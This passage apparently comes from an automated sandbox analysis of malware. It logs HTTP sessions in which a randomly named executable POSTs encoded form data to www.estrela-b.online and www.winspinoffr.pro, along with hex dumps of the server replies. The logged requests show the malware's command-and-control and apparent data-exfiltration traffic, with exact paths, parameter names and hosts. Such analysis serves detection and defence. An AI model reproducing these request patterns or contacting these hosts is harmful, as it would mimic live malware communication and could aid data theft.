95 02 3b c6 5b e9 6b 6d 37 6c 3d [TRUNCATED]
                                                                        Data Ascii: R]5}w}@x]ZTPEPQ3qklO&)zmQ)Qs9~{/~dMlnU3EnuQ4 =/dVz>fBmk]K_3{4)h`:tU24)%-XC,j51#y52 izoB+8fOX<9BE+#-AW9o-?Zn*QU=vVbd5EJCEc#?nX;[km7l=M4V*3a{7]z~I_fXO4A."{tR?w{tv#q{D*vMY2F2FGP1b33M!I(gV![';F["T|)P@?mK=iGH.Y|HsxD',}K|?WP*OUo3CZJc:d0PQW`Zr<8Y^Qeo!nzv!VSi7fC841c6kbt! D*qGW#B+o0ZFB1%y@y*oHEEB6KfcQ+elM\LS6tevV5,Es={E~/8%K$(u5p
                                                                        Nov 9, 2024 05:37:01.953381062 CET327INData Raw: ef 81 a4 c2 74 d9 eb 44 67 c8 76 85 3c a3 30 10 87 7d df e7 0b 33 39 35 08 f2 78 2d ca 4e 1b c5 7b 42 e1 12 0a f2 74 19 92 b8 75 a7 15 88 8c 45 32 2f c4 6d f6 ba 34 d2 de 64 a3 50 16 d1 81 05 4f 8a d2 0e f0 7e 78 dd a3 31 d8 67 bb 67 d8 93 27 d9
                                                                        Data Ascii: tDgv<0}395x-N{BtuE2/m4dPO~x1gg'0gGBLn4 >3|6zz-yjNj~J~w8NgBWL!b_yE?;dTm?AXlt


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        22192.168.2.550003162.241.63.77803660C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 9, 2024 05:37:03.779086113 CET775OUTPOST /e3rr/ HTTP/1.1
                                                                        Host: www.estrela-b.online
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 229
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.estrela-b.online
                                                                        Referer: http://www.estrela-b.online/e3rr/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Raw: 4a 38 4c 48 67 44 4a 70 3d 46 69 68 64 66 30 66 6f 77 64 49 74 6f 33 34 38 37 48 4c 4c 4f 49 75 32 51 4b 6d 63 6c 72 54 79 2b 49 61 4c 48 33 78 78 35 49 69 69 74 38 2b 78 47 38 74 30 52 41 53 37 34 62 43 37 78 49 44 71 4c 43 49 4a 30 65 5a 4e 37 6d 66 66 65 6e 63 67 61 2b 70 63 79 46 6b 4b 78 57 5a 6e 79 38 48 76 49 6a 35 6c 79 66 77 33 6f 78 43 56 53 69 32 77 31 64 64 33 33 74 48 56 6b 6a 4f 74 45 62 4a 6b 53 61 45 35 65 76 46 4f 79 56 53 45 31 46 54 56 63 35 66 33 2f 46 35 2b 48 77 43 57 7a 49 77 61 65 73 44 49 4d 73 41 55 6d 75 75 55 73 6d 6e 32 70 41 55 67 36 4e 67 78 58 32 67 5a 62 30 45 51 42 37 45 43 77 58 77 44 50 55 54 76 4d 67 70 34 41 77 59 51 72 32 56 46 37 78 75 67
                                                                        Data Ascii: J8LHgDJp=Fihdf0fowdIto3487HLLOIu2QKmclrTy+IaLH3xx5Iiit8+xG8t0RAS74bC7xIDqLCIJ0eZN7mffencga+pcyFkKxWZny8HvIj5lyfw3oxCVSi2w1dd33tHVkjOtEbJkSaE5evFOyVSE1FTVc5f3/F5+HwCWzIwaesDIMsAUmuuUsmn2pAUg6NgxX2gZb0EQB7ECwXwDPUTvMgp4AwYQr2VF7xug
                                                                        Nov 9, 2024 05:37:04.515614986 CET1236INHTTP/1.1 404 Not Found
                                                                        Date: Sat, 09 Nov 2024 04:37:04 GMT
                                                                        Server: Apache
                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Upgrade: h2,h2c
                                                                        Connection: Upgrade
                                                                        Vary: Accept-Encoding
                                                                        Content-Encoding: gzip
                                                                        X-Newfold-Cache-Level: 2
                                                                        X-Endurance-Cache-Level: 2
                                                                        X-nginx-cache: WordPress
                                                                        Content-Length: 1165
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Data Raw: 1f 8b 08 00 00 00 00 00 00 03 a5 52 5d 8f 1b 35 14 7d de fc 0a 77 10 7d 40 78 9c 5d 5a 1e b2 93 54 50 10 45 a2 50 51 a4 8a a7 ca 33 be 99 71 d7 e3 6b 6c 4f 26 29 ea 7f e7 7a be 9a dd 6d 51 29 51 a2 99 dc cf 73 cf 39 c5 83 1f 7e 7b fa c7 9f 2f 7e 64 4d 6c cd 6e 55 a4 07 33 d2 d6 db cc 45 fe fd ef d9 6e 75 51 34 20 15 3d 2f 8a 16 a2 64 56 b6 b0 cd 0e 1a 7a 87 3e 66 ac 42 1b c1 c6 6d d6 6b 15 9b ad 82 83 ae 80 0f 7f b2 bb 5d 1e 4b 8c e1 ac c7 a2 b6 0a 8e 5f 33 8b 7b 34 06 fb 8c 89 a1 29 ea 68 60 f7 1c 3a 16 74 04 f6 b0 55 32 34 d7 ec 29 b6 da d6 ec 25 a2 2d c4 58 93 aa 43 e5 b5 8b 2c f8 6a 9b 35 31 ba 8d 10 10 a2 07 23 79 99 a3 35 da 82 e8 1d d7 b6 32 9d 82 20 de d0 f7 af 0e fc 69 7a e4 6f 42 b6 2b c4 38 66 9c 18 4f 06 58 3c 39 42 1d e1 18 45 15 a8 e4 2b f6 f7 8a d1 a7 c4 23 0f fa 2d 41 d9 d0 bb 57 e0 39 85 ae 87 1c 6f f1 2d ff d7 82 1e ca 1b 1d 3f 5a f3 6e b5 2a 51 9d e6 55 b2 ba a9 3d 76 56 f1 0a 0d fa 0d eb 1b 62 64 1c 35 45 4a 43 45 63 04 0f e0 f7 c4 23 3f 6e 58 a3 95 02 3b c6 5b e9 6b 6d 37 6c 3d [TRUNCATED]
                                                                        Data Ascii: R]5}w}@x]ZTPEPQ3qklO&)zmQ)Qs9~{/~dMlnU3EnuQ4 =/dVz>fBmk]K_3{4)h`:tU24)%-XC,j51#y52 izoB+8fOX<9BE+#-AW9o-?Zn*QU=vVbd5EJCEc#?nX;[km7l=M4V*3a{7]z~I_fXO4A."{tR?w{tv#q{D*vMY2F2FGP1b33M!I(gV![';F["T|)P@?mK=iGH.Y|HsxD',}K|?WP*OUo3CZJc:d0PQW`Zr<8Y^Qeo!nzv!VSi7fC841c6kbt! D*qGW#B+o0ZFB1%y@y*oHEEB6KfcQ+elM\LS6tevV5,Es={E~/8%K$(u5p
                                                                        Nov 9, 2024 05:37:04.515636921 CET327INData Raw: ef 81 a4 c2 74 d9 eb 44 67 c8 76 85 3c a3 30 10 87 7d df e7 0b 33 39 35 08 f2 78 2d ca 4e 1b c5 7b 42 e1 12 0a f2 74 19 92 b8 75 a7 15 88 8c 45 32 2f c4 6d f6 ba 34 d2 de 64 a3 50 16 d1 81 05 4f 8a d2 0e f0 7e 78 dd a3 31 d8 67 bb 67 d8 93 27 d9
                                                                        Data Ascii: tDgv<0}395x-N{BtuE2/m4dPO~x1gg'0gGBLn4 >3|6zz-yjNj~J~w8NgBWL!b_yE?;dTm?AXlt


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        23192.168.2.550004162.241.63.77803660C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 9, 2024 05:37:06.321697950 CET1792OUTPOST /e3rr/ HTTP/1.1
                                                                        Host: www.estrela-b.online
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 1245
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.estrela-b.online
                                                                        Referer: http://www.estrela-b.online/e3rr/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Raw: 4a 38 4c 48 67 44 4a 70 3d 46 69 68 64 66 30 66 6f 77 64 49 74 6f 33 34 38 37 48 4c 4c 4f 49 75 32 51 4b 6d 63 6c 72 54 79 2b 49 61 4c 48 33 78 78 35 49 71 69 74 4c 57 78 46 64 74 30 51 41 53 37 35 62 43 34 78 49 43 6f 4c 43 51 46 30 65 56 64 37 6b 58 66 4d 55 6b 67 4e 64 78 63 34 46 6b 4b 74 6d 5a 71 76 4d 47 74 49 69 4a 68 79 66 67 33 6f 78 43 56 53 68 75 77 38 70 4a 33 31 74 48 61 77 7a 4f 70 41 62 4a 4d 53 5a 30 44 65 73 70 77 79 45 79 45 73 6c 44 56 61 4c 33 33 32 46 35 77 47 77 44 52 7a 49 39 61 65 73 33 45 4d 74 30 2b 6d 73 75 55 67 53 43 78 78 45 67 71 6a 63 41 76 59 6b 4d 33 47 78 34 41 49 70 42 79 71 48 77 77 4f 46 6a 66 48 6b 42 58 4a 78 78 55 77 53 73 4b 38 55 6e 65 47 67 49 6e 4a 58 73 43 64 47 4f 56 55 31 66 47 30 77 49 51 71 74 65 37 58 32 53 59 63 6c 49 51 30 32 63 6a 51 4d 71 55 69 46 2f 35 6b 52 70 70 77 74 43 41 70 43 4a 58 57 6b 56 67 64 49 5a 62 71 71 4e 74 53 70 41 52 52 31 4f 36 64 72 5a 69 6a 5a 38 45 38 73 62 38 42 66 61 43 2f 36 68 73 45 7a 58 42 37 6a 54 6c 59 71 6b 68 4c [TRUNCATED]
                                                                        Data Ascii: J8LHgDJp=Fihdf0fowdIto3487HLLOIu2QKmclrTy+IaLH3xx5IqitLWxFdt0QAS75bC4xICoLCQF0eVd7kXfMUkgNdxc4FkKtmZqvMGtIiJhyfg3oxCVShuw8pJ31tHawzOpAbJMSZ0DespwyEyEslDVaL332F5wGwDRzI9aes3EMt0+msuUgSCxxEgqjcAvYkM3Gx4AIpByqHwwOFjfHkBXJxxUwSsK8UneGgInJXsCdGOVU1fG0wIQqte7X2SYclIQ02cjQMqUiF/5kRppwtCApCJXWkVgdIZbqqNtSpARR1O6drZijZ8E8sb8BfaC/6hsEzXB7jTlYqkhL4T2uxe5iGcwSVzQX7E3pDhhTA9Zn/m4KCzd1vBdBS1UFUxxQ7m/EeUMZ6SM80uzLU72qjvLExTxseuwf2QQo7DVTLHo4JuL0jpFucsAV6FXQtho1MwfjeUWt/wt6+gW78QgAGzeiO4olZ7If+g+bgVFT/o44NN+W32l74R1WsMP4h6417sqZGxlDDbG52h2mIy5t/DLU/6XOwy/vRLOAVJIHmejw69RXumHo99eOS3tt/QJTdEE1z16YOL5koyslNJvbWvQpSmqS90DpfdQaCBqV/6QUTdpGAkinR+6rvDnoeDl13+CDgr9/MIqEZoZ2oQYJuYNUYOXcf4I5ug5HlAq2ZeGC8kCmQoNIGd5agocinTo02YKRNR5phRpBYxoGrnvsyH/ZEsXzBcb524+CWAVtDzFyRj9xeqVVxdtdTLd8xjpOHkk/nMhXiKbgTwCoMOSFAoHsRSEiAWg1IKl3ZCr0NqTiYk2JXLLmTO311ItuF/u48roriZ38o+OkqETBsF4hAEI3nleVY7JrdpZTMTF1YkmGOH+G/V8aUaB/+PULyV/4IXZkroTnTjzW4HQ3+6wJhRWKmnvz5ySiSISwLAq8LVwR4AyEduvzschDstKJhrlnwdgn+jYH64kGKrmHMZEv0EoEj+lrR5vOGXxasxKV0GrKC3WSfe [TRUNCATED]
                                                                        Nov 9, 2024 05:37:07.040445089 CET1236INHTTP/1.1 404 Not Found
                                                                        Date: Sat, 09 Nov 2024 04:37:06 GMT
                                                                        Server: Apache
                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Upgrade: h2,h2c
                                                                        Connection: Upgrade
                                                                        Vary: Accept-Encoding
                                                                        Content-Encoding: gzip
                                                                        X-Newfold-Cache-Level: 2
                                                                        X-Endurance-Cache-Level: 2
                                                                        X-nginx-cache: WordPress
                                                                        Content-Length: 1165
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Data Raw: 1f 8b 08 00 00 00 00 00 00 03 a5 52 5d 8f 1b 35 14 7d de fc 0a 77 10 7d 40 78 9c 5d 5a 1e b2 93 54 50 10 45 a2 50 51 a4 8a a7 ca 33 be 99 71 d7 e3 6b 6c 4f 26 29 ea 7f e7 7a be 9a dd 6d 51 29 51 a2 99 dc cf 73 cf 39 c5 83 1f 7e 7b fa c7 9f 2f 7e 64 4d 6c cd 6e 55 a4 07 33 d2 d6 db cc 45 fe fd ef d9 6e 75 51 34 20 15 3d 2f 8a 16 a2 64 56 b6 b0 cd 0e 1a 7a 87 3e 66 ac 42 1b c1 c6 6d d6 6b 15 9b ad 82 83 ae 80 0f 7f b2 bb 5d 1e 4b 8c e1 ac c7 a2 b6 0a 8e 5f 33 8b 7b 34 06 fb 8c 89 a1 29 ea 68 60 f7 1c 3a 16 74 04 f6 b0 55 32 34 d7 ec 29 b6 da d6 ec 25 a2 2d c4 58 93 aa 43 e5 b5 8b 2c f8 6a 9b 35 31 ba 8d 10 10 a2 07 23 79 99 a3 35 da 82 e8 1d d7 b6 32 9d 82 20 de d0 f7 af 0e fc 69 7a e4 6f 42 b6 2b c4 38 66 9c 18 4f 06 58 3c 39 42 1d e1 18 45 15 a8 e4 2b f6 f7 8a d1 a7 c4 23 0f fa 2d 41 d9 d0 bb 57 e0 39 85 ae 87 1c 6f f1 2d ff d7 82 1e ca 1b 1d 3f 5a f3 6e b5 2a 51 9d e6 55 b2 ba a9 3d 76 56 f1 0a 0d fa 0d eb 1b 62 64 1c 35 45 4a 43 45 63 04 0f e0 f7 c4 23 3f 6e 58 a3 95 02 3b c6 5b e9 6b 6d 37 6c 3d [TRUNCATED]
                                                                        Data Ascii: R]5}w}@x]ZTPEPQ3qklO&)zmQ)Qs9~{/~dMlnU3EnuQ4 =/dVz>fBmk]K_3{4)h`:tU24)%-XC,j51#y52 izoB+8fOX<9BE+#-AW9o-?Zn*QU=vVbd5EJCEc#?nX;[km7l=M4V*3a{7]z~I_fXO4A."{tR?w{tv#q{D*vMY2F2FGP1b33M!I(gV![';F["T|)P@?mK=iGH.Y|HsxD',}K|?WP*OUo3CZJc:d0PQW`Zr<8Y^Qeo!nzv!VSi7fC841c6kbt! D*qGW#B+o0ZFB1%y@y*oHEEB6KfcQ+elM\LS6tevV5,Es={E~/8%K$(u5p
                                                                        Nov 9, 2024 05:37:07.040463924 CET327INData Raw: ef 81 a4 c2 74 d9 eb 44 67 c8 76 85 3c a3 30 10 87 7d df e7 0b 33 39 35 08 f2 78 2d ca 4e 1b c5 7b 42 e1 12 0a f2 74 19 92 b8 75 a7 15 88 8c 45 32 2f c4 6d f6 ba 34 d2 de 64 a3 50 16 d1 81 05 4f 8a d2 0e f0 7e 78 dd a3 31 d8 67 bb 67 d8 93 27 d9
                                                                        Data Ascii: tDgv<0}395x-N{BtuE2/m4dPO~x1gg'0gGBLn4 >3|6zz-yjNj~J~w8NgBWL!b_yE?;dTm?AXlt


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        24192.168.2.550005162.241.63.77803660C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 9, 2024 05:37:08.902549028 CET492OUTGET /e3rr/?J8LHgDJp=IgJ9cBvr78oV/XAx6CGZHJrYQ+q7gdvT6YSgAnJN3Ii+ka2zR4pFTGuYtard36/gOxMLoedf5n7SHRQ/SfZ0+VwBsW9Pxqn6Ah8T9/ZStSyIEzKK6cN23N3L3zzTI9ofHg==&aF=JLp4o0Qx2F-p4F HTTP/1.1
                                                                        Host: www.estrela-b.online
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Nov 9, 2024 05:37:09.628434896 CET595INHTTP/1.1 301 Moved Permanently
                                                                        Date: Sat, 09 Nov 2024 04:37:09 GMT
                                                                        Server: nginx/1.23.4
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Content-Length: 0
                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                                                        X-Redirect-By: WordPress
                                                                        Location: http://estrela-b.online/e3rr/?J8LHgDJp=IgJ9cBvr78oV/XAx6CGZHJrYQ+q7gdvT6YSgAnJN3Ii+ka2zR4pFTGuYtard36/gOxMLoedf5n7SHRQ/SfZ0+VwBsW9Pxqn6Ah8T9/ZStSyIEzKK6cN23N3L3zzTI9ofHg==&aF=JLp4o0Qx2F-p4F
                                                                        X-Newfold-Cache-Level: 2
                                                                        X-Endurance-Cache-Level: 2
                                                                        X-nginx-cache: WordPress
                                                                        X-Server-Cache: true
                                                                        X-Proxy-Cache: MISS


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        25192.168.2.550006167.172.133.32803660C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 9, 2024 05:37:19.713305950 CET752OUTPOST /2493/ HTTP/1.1
                                                                        Host: www.winspinoffr.pro
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 209
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.winspinoffr.pro
                                                                        Referer: http://www.winspinoffr.pro/2493/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Raw: 4a 38 4c 48 67 44 4a 70 3d 75 46 51 69 59 45 56 48 61 56 78 4c 6b 6e 35 71 52 2b 32 6e 6e 70 4b 51 38 78 65 49 70 75 48 50 75 4e 75 2f 35 47 74 75 62 78 59 37 50 47 70 39 41 75 57 35 55 38 31 46 72 34 59 54 6c 77 54 76 6b 47 4f 52 67 71 79 68 44 6e 66 46 6b 4e 50 47 4a 30 44 51 58 65 77 39 30 2f 72 6c 32 6e 58 41 78 46 6d 68 2f 6c 37 52 59 53 6c 6d 31 34 34 46 68 49 48 39 54 48 6e 48 4f 6e 68 46 55 6c 43 57 54 4f 71 77 73 69 31 68 58 73 67 4c 41 64 72 51 34 61 71 52 70 2b 54 4f 2b 33 48 74 4b 39 4f 46 64 53 67 58 42 6c 4f 51 47 4f 75 6b 59 33 44 76 4a 6a 75 4b 68 7a 6e 75 5a 47 6a 45 49 57 48 73 4a 52 6f 6c 6b 31 30 3d
                                                                        Data Ascii: J8LHgDJp=uFQiYEVHaVxLkn5qR+2nnpKQ8xeIpuHPuNu/5GtubxY7PGp9AuW5U81Fr4YTlwTvkGORgqyhDnfFkNPGJ0DQXew90/rl2nXAxFmh/l7RYSlm144FhIH9THnHOnhFUlCWTOqwsi1hXsgLAdrQ4aqRp+TO+3HtK9OFdSgXBlOQGOukY3DvJjuKhznuZGjEIWHsJRolk10=
                                                                        Nov 9, 2024 05:37:20.370877981 CET369INHTTP/1.1 404 Not Found
                                                                        Server: nginx/1.26.1
                                                                        Date: Sat, 09 Nov 2024 04:37:20 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Content-Encoding: gzip
                                                                        Data Raw: 62 31 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 c1 0a c2 30 10 44 ef 82 ff b0 7e 40 1a 23 c5 53 c8 45 14 3c e8 c5 2f 48 dd b5 09 a4 1b 89 11 ec df 9b 6a 0b e2 d9 a3 c7 9d 7d 33 0c a3 5d ee 82 99 cf b4 23 8b 46 67 9f 03 99 7a 59 c3 31 66 d8 c5 3b a3 96 6f 51 cb 17 52 d0 26 62 3f 58 ce c4 99 92 d1 4e 7d 3b 8a a2 e5 f8 1e b2 0b 34 5e dc 7a 7e 48 55 ad d6 95 fa 44 e4 14 2a a7 42 0b 21 c0 c2 d5 22 7a 6e 21 47 40 7f b3 4d 20 38 9c f6 5b b0 8c b0 71 29 76 04 97 e4 89 31 f4 40 29 c5 54 1c 2d 81 10 43 c1 7f c4 2f b7 78 02 1a 70 c3 f4 2b 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: b10D~@#SE</Hj}3]#FgzY1f;oQR&b?XN};4^z~HUD*B!"zn!G@M 8[q)v1@)T-C/xp+0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        26192.168.2.550007167.172.133.32803660C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 9, 2024 05:37:22.253962040 CET772OUTPOST /2493/ HTTP/1.1
                                                                        Host: www.winspinoffr.pro
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 229
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.winspinoffr.pro
                                                                        Referer: http://www.winspinoffr.pro/2493/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Raw: 4a 38 4c 48 67 44 4a 70 3d 75 46 51 69 59 45 56 48 61 56 78 4c 6b 48 4a 71 64 39 4f 6e 77 5a 4b 58 77 52 65 49 6e 4f 47 47 75 4d 53 2f 35 44 4a 2b 62 43 38 37 49 6e 35 39 44 73 2b 35 52 38 31 46 68 59 59 57 34 41 54 34 6b 47 54 6d 67 72 65 68 44 6e 4c 46 6b 50 48 47 4a 46 44 54 4e 75 77 7a 34 66 72 6a 37 48 58 41 78 46 6d 68 2f 6c 76 2f 59 53 74 6d 31 72 51 46 67 70 48 36 65 6e 6e 41 59 33 68 46 46 31 43 53 54 4f 71 53 73 6a 70 4c 58 75 59 4c 41 5a 6e 51 35 4c 71 65 6a 2b 54 41 7a 58 47 6b 44 74 66 5a 61 69 55 38 4b 6b 62 4a 48 59 75 79 51 68 79 46 54 42 6d 69 79 54 4c 57 4a 56 72 7a 5a 6d 6d 46 54 79 34 56 36 69 67 6b 37 76 47 4c 39 4f 64 65 4c 71 74 77 45 42 2b 4e 7a 4e 57 68
                                                                        Data Ascii: J8LHgDJp=uFQiYEVHaVxLkHJqd9OnwZKXwReInOGGuMS/5DJ+bC87In59Ds+5R81FhYYW4AT4kGTmgrehDnLFkPHGJFDTNuwz4frj7HXAxFmh/lv/YStm1rQFgpH6ennAY3hFF1CSTOqSsjpLXuYLAZnQ5Lqej+TAzXGkDtfZaiU8KkbJHYuyQhyFTBmiyTLWJVrzZmmFTy4V6igk7vGL9OdeLqtwEB+NzNWh
                                                                        Nov 9, 2024 05:37:22.935378075 CET369INHTTP/1.1 404 Not Found
                                                                        Server: nginx/1.26.1
                                                                        Date: Sat, 09 Nov 2024 04:37:22 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Content-Encoding: gzip
                                                                        Data Raw: 62 31 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 c1 0a c2 30 10 44 ef 82 ff b0 7e 40 1a 23 c5 53 c8 45 14 3c e8 c5 2f 48 dd b5 09 a4 1b 89 11 ec df 9b 6a 0b e2 d9 a3 c7 9d 7d 33 0c a3 5d ee 82 99 cf b4 23 8b 46 67 9f 03 99 7a 59 c3 31 66 d8 c5 3b a3 96 6f 51 cb 17 52 d0 26 62 3f 58 ce c4 99 92 d1 4e 7d 3b 8a a2 e5 f8 1e b2 0b 34 5e dc 7a 7e 48 55 ad d6 95 fa 44 e4 14 2a a7 42 0b 21 c0 c2 d5 22 7a 6e 21 47 40 7f b3 4d 20 38 9c f6 5b b0 8c b0 71 29 76 04 97 e4 89 31 f4 40 29 c5 54 1c 2d 81 10 43 c1 7f c4 2f b7 78 02 1a 70 c3 f4 2b 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: b10D~@#SE</Hj}3]#FgzY1f;oQR&b?XN};4^z~HUD*B!"zn!G@M 8[q)v1@)T-C/xp+0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        27192.168.2.550008167.172.133.32803660C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 9, 2024 05:37:24.804192066 CET1789OUTPOST /2493/ HTTP/1.1
                                                                        Host: www.winspinoffr.pro
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 1245
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.winspinoffr.pro
                                                                        Referer: http://www.winspinoffr.pro/2493/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Raw: 4a 38 4c 48 67 44 4a 70 3d 75 46 51 69 59 45 56 48 61 56 78 4c 6b 48 4a 71 64 39 4f 6e 77 5a 4b 58 77 52 65 49 6e 4f 47 47 75 4d 53 2f 35 44 4a 2b 62 43 30 37 50 56 68 39 41 4e 2b 35 57 38 31 46 2f 49 59 58 34 41 54 41 6b 47 4c 71 67 71 69 78 44 6c 7a 46 2b 74 2f 47 4c 78 58 54 44 65 77 7a 69 2f 72 6d 32 6e 57 61 78 46 32 6c 2f 6c 2f 2f 59 53 74 6d 31 75 55 46 6e 34 48 36 63 6e 6e 48 4f 6e 67 4b 55 6c 43 71 54 4f 43 6f 73 6a 39 78 51 65 34 4c 41 39 4c 51 30 64 32 65 76 2b 54 43 77 58 47 38 44 74 54 77 61 69 34 61 4b 6c 66 6a 48 66 69 79 54 56 7a 41 4b 52 36 41 73 31 44 55 42 46 66 74 4e 78 71 59 54 67 68 68 36 51 78 65 30 73 50 6f 2f 49 34 59 4f 4c 52 36 46 47 47 41 69 4e 7a 55 62 63 4a 7a 33 68 54 4d 4c 65 38 37 30 69 46 30 52 39 34 73 57 4a 6d 78 53 65 4d 79 54 71 48 66 4d 41 6f 4d 74 44 5a 6a 4a 77 4f 52 78 4d 33 30 4b 7a 77 2b 55 52 77 70 57 79 30 53 66 7a 32 32 69 72 32 33 55 37 43 38 6b 63 4b 75 4b 31 36 64 47 4f 34 30 47 74 46 36 64 54 51 55 75 61 62 78 63 58 51 78 38 77 61 63 31 59 44 51 57 [TRUNCATED]
